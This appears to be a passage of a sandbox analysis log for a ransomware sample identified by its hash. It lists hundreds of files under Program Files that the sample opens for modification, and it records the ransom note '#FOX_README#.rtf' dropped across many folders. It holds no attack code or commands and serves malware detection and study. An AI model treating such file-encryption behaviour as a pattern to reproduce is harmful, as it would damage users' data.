Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\GrantMove.mpe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Whitehorse f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification 